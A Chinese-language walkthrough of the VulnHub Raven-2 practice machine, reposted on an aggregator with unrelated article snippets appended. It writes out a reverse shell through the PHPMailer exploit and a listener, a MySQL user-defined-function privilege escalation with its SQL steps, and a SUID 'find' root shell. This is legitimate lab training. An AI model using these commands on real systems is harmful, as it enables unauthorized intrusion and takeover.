靶場練習第二十五天~vulnhub靶場之Raven-2

一、準備工作

kali和靶機都選擇NAT模式(kali與靶機同網段)

1.靶場環境

下載鏈接:Raven: 2 ~ VulnHub

2.kali的ip

命令:ifconfig

3.靶機的ip

掃描靶機ip

sudo arp-scan -l

二、信息收集

1.nmap的信息收集

(1)掃描靶機開放的端口及其服務

nmap -A 192.168.101.128

2.網站的信息收集

(1)靶機開放了80端口,先訪問靶機網站看看有什么有用的信息

訪問靶機網站,沒有發現什么信息

(2)dirb掃描靶機網站

dirb http://192.168.101.128

1)發現dirb掃描到的網站除了一個wordpress其他都是文件目錄,可能存在文件目錄瀏覽漏洞

2)對目錄文件進行排查,在vendor目錄下的PATH文件里找到了第一個flag

3)在vendor目錄下的README.md里面看到了PHPMailer(一個功能齊全的PHP電子郵件創建和傳輸類)

4)在VERSION目錄文件中得知PHPMailer版本號為5.2.16

知識點:PHPMailer < 5.2.18版本存在安全漏洞,可使未經身份驗證的遠程攻擊者在Web服務器用戶上下文中執行任意代碼,遠程控制目標web應用

三、漏洞發現及利用

(1)searchsploit命令搜索到可利用的漏洞

searchsploit PHPMailer

1)將相關的腳本文件拷貝

cp /usr/share/exploitdb/exploits/php/webapps/40974.py ./

2)修改腳本內容

vim 40974.py

:wq

3)在攻擊機kali終端開啟監聽端口4444

nc -lvvp 4444

4)運行腳本

python 40974.py

如果報錯執行下面的命令

pip install requests-toolbelt

編碼問題就在第一行腳本里面添加

#! /usr/bin/python3$

# -*- coding: utf-8 -*-$

如果兩個都不行嘗試一下下面的命令

python3 40974.py

我這里提示是說未聲明編碼,所以在腳本第一行添加

原來是我的python是python3

5)先訪問 http://192.168.101.128:80/contact.php,就會生成后門文件 shell1.php,再訪問 http://192.168.101.128/shell1.php,就成功反彈了一個shell到攻擊機上2b206d59efac24d9e827f20976320098.pnga66a76a67bd9eae87f1ba24efaf505ca.png

6)看看kali那邊情況,成功監聽

四、提權

1.優化命令執行終端,執行下面命令進入python交互式(注意要下載python環境才能運行):

python -c 'import pty; pty.spawn("/bin/bash");'

2.尋找flag文件

find ./ -name flag*

3.查看剛才尋找到的flag2文件

cat /var/www/flag2.txt

4.flag3為圖片,網站下查看

http://192.168.101.128/wordpress/wp-content/uploads/2018/11/flag3.png

5. 查看mysql的config配置文件

cd /var/www/html/wordpress

ls -al

cat wp-config.php

6.發現了網站的mysql數據庫,數據庫的賬號密碼root:R@v3nSecurity

mysql -u root -pR@v3nSecurity

7.mysql

1)查看數據庫

show databases;

2)在kali終端查找腳本

searchsploit 1518.c

3)腳本下載到靶機

1.復制腳本

cp /usr/share/exploitdb/exploits/linux/local/1518.c .

2.gcc 編譯、運行

gcc -g -shared -o x7.so 1518.c -lc

3.kali開啟http服務

python -m SimpleHTTPServer

4.靶機下載腳本

cd /tmp

wget http://192.168.101.10:8000/x7.so

ls

4)進入數據庫創建數據表 foo,向表中插入二進制數據,然后利用dumpfile函數把文件導出, 再新建存儲函數do_system類型是integer,別名(soname)文件名字

mysql -u root -pR@v3nSecurity

use mysql;

create table foo(line blob);

insert into foo values(load_file('/tmp/x7.so'));

select * from foo into dumpfile '/usr/lib/mysql/plugin/x7.so';

create function do_system returns integer soname 'x7.so';

select * from mysql.func;

5)通過do_system函數給find命令所有者的suid權限,使其可以執行root權限的命令

select do_system('chmod u+s /usr/bin/find');

exit

8.提權

find / -exec "/bin/sh" \;

1)flag4

cd /root

cat flag4.txt

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/375023.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/375023.shtml
英文地址,請注明出處:http://en.pswp.cn/news/375023.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

每天一個linux命令(46):vmstat命令

vmstat是Virtual Meomory Statistics&#xff08;虛擬內存統計&#xff09;的縮寫&#xff0c;可對操作系統的虛擬內存、進程、CPU活動進行監控。他是對系統的整體情況進行統計&#xff0c;不足之處是無法對某個進程進行深入分析。vmstat 工具提供了一種低開銷的系統性能觀察方…

用TypeScript開發了一個網頁游戲引擎,開放源代碼

最開始學習電腦編程的原動力之一就是想自己編寫游戲&#xff0c;一方面很好奇這些游戲是怎么做出來的&#xff0c;另一方面覺得有些地方設計的不合理&#xff0c;希望電腦游戲既能讓人玩的有趣&#xff0c;又不浪費時間。 學校五年&#xff0c;畢業十年&#xff0c;學用了十多種…

靶場練習第二十一天~vulnhub靶場之Momentum-1

一、環境搭建 1.ifconfig查看kali的ip 2.創建靶機 靶機下載地址&#xff1a;Momentum: 1 ~ VulnHub 二、信息收集 1.nmap命令 尋找靶機ip&#xff1a;nmap 192.168.101.0/24 2.端口掃描 使用命令&#xff1a;nmap -A -T4 -p 1-65535 192.168.101.113&#xff0c;發現開放2…

為集合排序的三個方法

// 為集合字符串排序&#xff08;cmpare:&#xff09; // - null &#xff1a;空類型 就是字符型的0&#xff1b; // - [NSNull null]是對象類型&#xff0c;能夠存入集合的數據&#xff1a;為其分配了內存&#xff0c;但其中的值為空&#xff08;不能被排序否則程序會崩潰&am…

C#ArrayList對象集合

ArrayList alist new ArrayList();//集合對像 長度可以改變&#xff0c;類型不限//添加單個元素可以Add()alist.Add("在在的");alist.Add(35);alist.Add(3.14);alist.Add(c);alist.Add(5000m);//如果用Add()添加數組或集合最好用 alist.AddRange()alist.AddRange(…

靶場練習第二十二天~vulnhub靶場之Momentum-2

一、準備工作 靶機下載地址&#xff1a;Momentum: 2 ~ VulnHub 1.查看kali的ip 使用命令ifconfig 2.使用nmap命令 nmap 192.168.101.0/24 查看開放的端口和協議&#xff1a;nmap -sV 192.168.101.114 二、信息收集 1.使用gobuster&#xff0c;尋找隱藏的網站 gobuster di…

索引深入淺出(8/10):覆蓋索引或列包含

在索引深入淺出&#xff1a;非聚集索引的B樹結構在聚集表里&#xff0c;在聚集表里&#xff0c;我們看到非聚集索引的葉子層只包含非聚集索引鍵和聚集索引鍵。從聚集表結構或堆表結構里拿到剩下列&#xff0c;SQL Server需要進行書簽/鍵查找操作。很多情況下書簽或鍵查找非常消…

靶場練習第二十三天~vulnhub靶場之GOATSELINUX: 1

一、準備工作 kali和靶機都選擇NAT模式&#xff08;kali與靶機同網段&#xff09; 1.靶場環境 下載鏈接:GoatseLinux: 1 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶機的ip 掃描靶機ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 &#xff08;1&#xff09;掃描靶機…

Spring事務報Connection is read-only

昨天做項目時&#xff0c;寫了個方法,程序突然報了Connection is readonly. Queries leading to data modification are not allowed調了程序半天&#xff0c;最后才發現是自己在spring配置文件中增加了事務.把方法寫成了大寫開頭了&#xff0c;但是spring配置是以小寫開頭 代碼…

HTTP協議具體解釋

HTTP是一個屬于應用層的面向對象的協議。因為其簡捷、高速的方式。適用于分布式超媒體信息系統。它于1990年提出&#xff0c;經過幾年的使用與發展&#xff0c;得到不斷地完好和擴展。眼下在WWW中使用的是HTTP/1.0的第六版&#xff0c;HTTP/1.1的規范化工作正在進行之中&#x…

靶場練習第二十四天~vulnhub靶場之Raven-1

一、準備工作 kali和靶機都選擇NAT模式&#xff08;kali與靶機同網段&#xff09; 1.靶場環境 下載鏈接:Raven: 1 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶機的ip 掃描靶機ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 &#xff08;1&#xff09;掃描靶機開放的…

【知識積累】DES算法之C#加密Java解密

一、前言 在項目需要添加安全模塊&#xff0c;客戶端調用服務端發布的service必須要經過驗證&#xff0c;加密算法采用DES&#xff0c;客戶端采用C#進行加密&#xff0c;服務端使用Java進行解密。廢話不多說&#xff0c;直接上代碼。 二、客戶端 客戶端采用C#進行開發&#xff…

Space.js – HTML 驅動的頁面 3D 滾動效果

為了讓我們的信息能夠有效地溝通&#xff0c;我們需要創建用戶和我們的媒體之間的強有力的聯系。今天我們就來探討在網絡上呈現故事的新方法&#xff0c;并為此創造了一個開源和免費使用的 JavaScript 庫稱為 space.js。該庫是 HTML 驅動的&#xff0c;這意味著你不需要在網站上…

離職感言-Symbio的5年工作回顧和總結(轉載)

離職感言-Symbio的5年工作回顧和總結 (2011-06-02 21:06:30) 轉載▼2005年底&#xff0c;當時我在西安過的還不錯&#xff0c;結了婚&#xff0c;買了房&#xff0c;在公司也受老板器重&#xff0c;但是初為人父&#xff0c;孩子帶給我的那種人生緊迫感&#xff1a;“再不趁還…

64位CentOS6.2安裝erlang及rabbitmqServer

CentOS 6.2 64bit 安裝erlang及RabbitMQ Server 1、操作系統環境(CentOS 6.2 64bit) 1 [rootHAproxy ~]# cat /etc/issue2 3 CentOS release 6.2 (Final)4 Kernel \r on an \m5 [rootHAproxy ~]# cat /proc/cpuinfo |grep "clflush size"6 clflush size : 647 clf…

Kafka的Producer和Consumer源碼學習

先解釋下兩個概念&#xff1a; high watermark (HW) 它表示已經被commited的最后一個message offset(所謂commited, 應該是ISR中所有replica都已寫入)&#xff0c;HW以下的消息都已被ISR中各個replica同步&#xff0c;從而保持一致。HW以上的消息可能是臟數據&#xff1a;部分r…

for+next()實現數組的遍歷及while list each 的使用

//要求使用for循環語句來完成該數組的遍歷//輸出每一項的鍵名和對應值&#xff1a; $a array( a > 34, 5 > 51, 13, 32, bb>15, 2 > 31 ); $len count($a); for($i0;$i<$len;$i)…

讀Pyqt4教程,帶你入門Pyqt4 _005

對話框窗體或對話框是現代GUI應用不可或缺的一部分。dialog定義為兩個或多個人之間的交談。在計算機程序中dialog是一個窗體&#xff0c;用來和程序“交談”。對話框用來輸入數據、修改數據、改變程序設置等等。對話框是用戶和計算機程序溝通的重要手段。 QColorDialog 顏色對話…

Linux內核的啟動過程分析

秦鼎濤 《Linux內核分析》MOOC課程http://mooc.study.163.com/course/USTC-1000029000  一、實驗目的及要求&#xff1a; 使用gdb跟蹤調試內核從start_kernel到init進程啟動 詳細分析從start_kernel到init進程啟動的過程并結合實驗截圖撰寫一篇署名博客&#xff0c;并在博客文…

static修飾符詳解

static表示“全局”或者“靜態”的意思&#xff0c;用來修飾成員變量和成員方法&#xff0c;也可以形成靜態static代碼塊&#xff0c;但是Java語言中沒有全局變量的概念。被static修飾的成員變量和成員方法獨立于該類的任何對象。也就是說&#xff0c;它不依賴類特定的實例&…